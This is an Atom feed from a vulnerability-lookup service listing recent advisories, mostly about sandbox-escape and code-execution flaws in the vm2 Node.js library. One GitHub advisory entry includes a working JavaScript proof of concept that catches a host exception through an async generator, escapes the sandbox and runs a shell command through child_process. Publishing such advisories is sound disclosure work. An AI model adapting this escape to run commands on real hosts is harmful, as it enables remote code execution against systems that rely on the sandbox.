<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-04T02:35:08.728774+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-07028</id>
    <title>bdu:2026-07028</title>
    <updated>2026-10-04T02:35:08.735097+00:00</updated>
    <content>bdu:2026-07028</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-07028"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-364319</id>
    <title>EUVD-2026-364319</title>
    <updated>2026-10-04T02:35:08.735131+00:00</updated>
    <content>EUVD-2026-364319</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-364319"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-45411</id>
    <title>fkie_cve-2026-45411</title>
    <updated>2026-10-04T02:35:08.735146+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.3, it is possible to catch a host exception using the yield* expression inside an async generator. When the generator is closed using the return function, the value is awaited on and exceptions thrown in the then call will be caught by the runtime and passed to the yield* iterator as the next value. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This vulnerability is fixed in 3.11.3.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-45411"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-248r-7h7q-cr24</id>
    <title>GHSA-248r-7h7q-cr24 — vm2 Has a Sandbox Breakout Using Async Generator</title>
    <updated>2026-10-04T02:35:08.735177+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: vm2</p>
<p>### Summary</p>
<p>VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.</p>
<p>### Details</p>
<p>It is possible to catch a host exception using the `yield*` expression inside an async generator. When the generator is closed using the `return` function, the value is awaited on and exceptions thrown in the `then` call will be catched by the runtime and passed to the `yield*` iterator as the next value.</p>
<p>### PoC</p>
<p>```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
class E extends Error {}
function so(d) {
	if (d &gt; 0) so(d-1);
	const e = new E();
	e.stack;
	throw e;
}
async function* helper() {
	yield* {
		[Symbol.asyncIterator]: ()=&gt;({
			next: v=&gt;({value: v, done: false})
		})
	};
}
async function doCatch(f) {
	const i=helper();
	await i.next();
	const v = await i.return({then(r){f();r();}});
	return v.value;
}
(async function f() {
	let min = 0;
	let max = 10000000;
	while (min&lt;max) {
		const mid = (min+max)&gt;&gt;1;
		const e = await doCatch(()=&gt;so(mid));
		if (e.name==="RangeError" &amp;&amp; !(e instanceof RangeError)) {
			e.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
			return;
		}
		if (e instanceof E) {
			min = mid+1;
		} else {
			max = mid;
		}
	}
})();
`));
```</p>
<p>### Impact</p>
<p>Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the conte…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-248r-7h7q-cr24"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:50850</id>
    <title>RHSA-2026:50850 — Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.1 security update</title>
    <updated>2026-10-04T02:35:08.735234+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators vm2: vm2: Arbitrary code execution via sandbox escape vm2: vm2: Remote code execution due to path restriction bypass via symlinks vm2: vm2: Remote code execution via NodeVM builtin allowlist bypass vm2: vm2: Sandbox escape allows direct interaction with host objects vm2: vm2: Sandbox escape leads to Denial of Service vm2: vm2: Information disclosure through unsanitized host paths vm2: vm2: Sandbox escape due to code transformer optimization bypass vm2: vm2: Denial of Service via host memory exhaustion vm2: vm2: Sandbox Escape leading to Arbitrary Code Execution vm2: vm2: Sandbox escape via arbitrary prototype access leading to arbitrary code execution vm2: vm2: Arbitrary code execution via nested NodeVM bypass vm2: vm2: Arbitrary code execution due to sandbox escape vm2: vm2: Arbitrary Code Execution via Sandbox Escape vm2: vm2: Arbitrary Code Execution due to sandbox escape vulnerability vm2: vm2: Arbitrary code execution via sandbox escape vulnerability vm2: vm2: Sandbox escape allows arbitrary code execution on the host system vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions vm2: vm2: NodeVM observability builtins leak host process and HTTP request data vm2: vm2: Integrity…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:50850"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1446</id>
    <title>WID-SEC-W-2026-1446 — vm2: Schwachstelle ermöglicht Codeausführung</title>
    <updated>2026-10-04T02:35:08.735288+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein entfernter, anonymer Angreifer kann eine Schwachstelle in vm2 ausnutzen, um beliebigen Programmcode auszuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1446"/>
  </entry>
</feed>
